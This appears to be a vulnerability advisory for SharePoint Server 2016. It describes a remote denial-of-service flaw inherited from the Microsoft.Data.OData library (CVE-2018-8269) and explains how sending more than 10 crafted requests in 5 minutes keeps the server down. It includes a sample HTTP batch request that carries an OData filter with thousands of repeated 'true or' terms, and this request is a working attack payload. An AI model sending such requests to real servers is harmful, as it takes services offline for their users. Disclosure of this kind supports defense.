SharePoint Server 2016
A vulnerability in Microsoft SharePoint Server could allow a remote attacker to make the server unavailable.
The vulnerability is a result of the dependency SharePoint has in
Microsoft.Data.OData library which was vulnerable to remote DOS (See CVE-2018-8269).
The exploit is done by sending a crafted request that contains an OData filter that triggers the vulnerability in Microsoft.Data.OData library. Sending such request, will terminate the process that runs the server.
By default, SharePoint server is configured to recover a terminated process, but it will do so only 10 times. If more than 10 malicious requests are sent in 5 minutes interval, the server will not recover and will be down until it is manually restarted.
Following is a sample HTTP request that can be used for such attack.
POST /_api/$batch HTTP/1.1 Host: test-server X-RequestDigest: XXXXX Authorization: Basic XXXXX content-type: multipart/mixed; boundary=batch_312b6c52-0483-45b9-9133-91be5d91edb9 Content-Length: 49012 --batch_312b6c52-0483-45b9-9133-91be5d91edb9 Content-type: application/http Content-Transfer-Encoding: binary GET http://test-server/_api/web/lists?$filter=true+or+true+or+true+ … (~ 6100 repetitions) HTTP/1.1 accept: application/json;odata.metadata=minimal --batch_312b6c52-0483-45b9-9133-91be5d91edb9--